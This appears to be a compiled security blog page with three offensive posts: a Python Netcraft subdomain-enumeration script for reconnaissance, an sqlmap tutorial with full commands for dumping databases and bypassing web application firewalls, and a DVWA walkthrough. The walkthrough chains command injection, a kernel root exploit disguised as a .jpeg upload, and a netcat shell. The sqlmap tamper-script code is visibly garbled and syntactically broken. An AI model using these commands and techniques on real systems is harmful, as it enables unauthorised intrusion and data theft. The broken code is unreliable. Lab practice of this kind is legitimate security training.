Netcraft Dns Search Engine

DNS Results From Netcraft Search Engine

The following python script is dedicated for CHC Members and it can obtain DNS results from netcraft search engine.This can be used in the information gathering stage of a penetration test.You can find the source code and a screenshot of the usage of this script below:


#!/usr/bin/python

import httplib

import re
import sys
import string
def help():
print "[netcraftdns v1.0] - by neuro [0x0lab.org]"
print "\nUsage: python netcraftdns.py <domain_name> \n"
sys.exit()
if len(sys.argv) < 1 or len(sys.argv) > 2:
help()
elif len(sys.argv) == 2:
domain_name =  sys.argv[1]
else:
help()

netcraftres=[]
totalnum=[]
def count(domain_name):
global nres
rg = httplib.HTTP('searchdns.netcraft.com')
rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)
rg.putheader('Host', 'searchdns.netcraft.com')
rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rg.endheaders()
errcode, errmsg, headers = rg.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata = rg.getfile().read()
searchres_pattern='Found [0-9]*'
sp = re.compile(searchres_pattern, re.I)
res=sp.findall(rgdata)
for total in res:
resclean=re.sub('Found ', '', total)
nres=resclean
print "[+]-Total Netcraft Results:", nres
def results(domain_name):
y=21
i=1
rg = httplib.HTTP('searchdns.netcraft.com')
rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)
rg.putheader('Host', 'searchdns.netcraft.com')
rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rg.endheaders()
errcode, errmsg, headers = rg.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata = rg.getfile().read()
pattern='[\w\.\-]+.'+domain_name
rgr = re.compile(pattern, re.I)
rgresults = rgr.findall(rgdata)
for netres in rgresults:
if netcraftres.count(netres) == 0:
netcraftres.append(netres)
print " |-", str(netres)
i=i+1
while y<nres:
if nres=="0":
break
rgi = httplib.HTTP('searchdns.netcraft.com')
rgi.putrequest('GET', "/?host=*."+domain_name+"&last="+netcraftres[-1]+"&from="+str(y)+"&restriction=site%20contains&position=")
rgi.putheader('Host', 'searchdns.netcraft.com')
rgi.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
rgi.endheaders()
errcode, errmsg, headers = rgi.getreply()
if errcode!=200:
print 'Error Sending Request', errcode, errmsg
else:
rgdata1 = rgi.getfile().read()
pattern2='[\w\.\-]+.'+domain_name
rgr1 = re.compile(pattern2, re.I)
rgresults1 = rgr.findall(rgdata1)
if y > int(nres):
break
else:
y = y + 20
for netres1 in rgresults1:
if netcraftres.count(netres1) == 0:
netcraftres.append(netres1)
print " |-", str(netres1)
i=i+1
count(domain_name)
results(domain_name)


netcraftdns – Sample Results

Advance Sqlmap Commands

Advance Sqlmap tutorial

1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable then sqlmap can act as scanner in that case. The syntax for the GET request is as follow ./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy" The syntax for the POST request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.Note: Through out this tutorial we will take POST request as an example. The only difference in the syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.

2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" sqlmap will try to check if parameter "id" is injectable or not.

3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates with the application then the steps would be as follows,a) Login into your application.b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.So the syntax will be as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5.... To get the tables of dummydb database , the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"

6.... To get the columns of admin table, the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"

7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py" All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.

9.... Writing your own Tamper script.There are certain cases when application has very weak detection signature but none of the tamper script can do the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to injectthat target as all the payloads of sqlmap will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.So let us create our own tamper script. The format of any tamper script will be as follow


# Needed imports
from lib.core.enums import PRIORITY

#Define which is the order of application of tamper scripts against the payload

__priority__ = PRIORITY.NORMAL

def tamper(payload):

''' Description of your tamper script

''' Description of your tamper script ''' Description of your tamper script '''

retVal = payload

# your code to tamper the original payload # return the tampered payload 

return retVal

Based on the above tamper script format, our script will be

#!/usr/bin/env python 
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
""" 
from lib.core.enums import PRIORITY __priority____priority__ = PRIORITY.NORMAL
def tamper(payload): 
""" INPUT : UNION ALL SELECT OUTPUT : UNION ALL SELEcT TESTED AGAINST: mysql 5.x.x """ 
INPUT    : UNION ALL SELECT 
OUTPUT : UNION ALL SELECT
TESTED AGAINST: mysql 5.x.x 
""" 
if payload: 
   retVal="" i=0 for i in xrange(len(payload)): 
if payload[i:i+10] == "ALL SELECT": 
  retVal +="ALL SELEcT" + payload[i+10:] 
break 
else: retval += payload[i] 
return retVal

Advanced Web Penetration

 Web Application Hacking

In this post, I'll try to show how to gain a root access through a web application. There are a lot of method to do that, this is one of them. The web application that will be used is DVWA(Damn Vulnerable Web Application). You can download it here. The installation is there too.

- Start up your apache and mysql.

- Open dvwa in browser.

- Login with username : admin and password : password.

- DVWA main page.

- The vulnerability that I'll use to gain root access from this web is through its "command execution" vulnerability because in a web, this is the most dangerous feature to have. Hacker can get a shell without having to place a backdoor inside the server.

- Set the security level to medium. (because 'low' would be too easy and 'hard' would be too difficult..   :P   )

- Lets try to do a normal command.

- Next, lets execute multiple command.

 

- Lets try to use pipe "|". 

- Looking good. Now, lets begin the attack.  >:)

- I'll use a local exploit on the system to gain the root access. Before searching the exploit, lets see what version of kernel the system running.

- Search the exploitdb for the local exploit. Using keyword "2.6.39" I found this exploit created by zx2c4 coded in C language.

- After download the exploit, lets compile it first before transferring it to the target. Original Exploit code here.

- Exploit ready to be used.

- Now lets try to upload it using "File Upload" on dvwa. Before doing that, I'll increase dvwa security into High level because it is a rule in my training center.

- Ok, lets try to upload the exploit.

- Whoops, it looks like the server only accept image file to be uploaded.

- Lets try to add image extention into the exploit. I'll make it into exploit.jpeg

- Upload it.

- Good. Now, lets connect to the server using netcat to execute that exploit.

- Back to "Command Execution" feature. (Don't forget to change the dvwa security to medium again)

- Lets see if the exploit is correctly uploaded.

- Now, execute netcat on the dvwa on listening mode.

- Look on the bottom/status bar. The browser will wait for a connection. In backtrack's terminal type this. "nc 127.0.0.1 4321"

- Then, move to the directory where the exploit is located.

- Execute it.  

- Not good, the exploit didn't work properly.  =,=

- Turns out that I haven't change the permission to execute the exploit.  :P

- To change it simply type "chmod 777 exploit.jpeg"

- Next, lets try to execute it again.

-Its running. But the process to spawn a root shell is taking so long. I wonder if the exploit is succeeded. Have to research more..  :)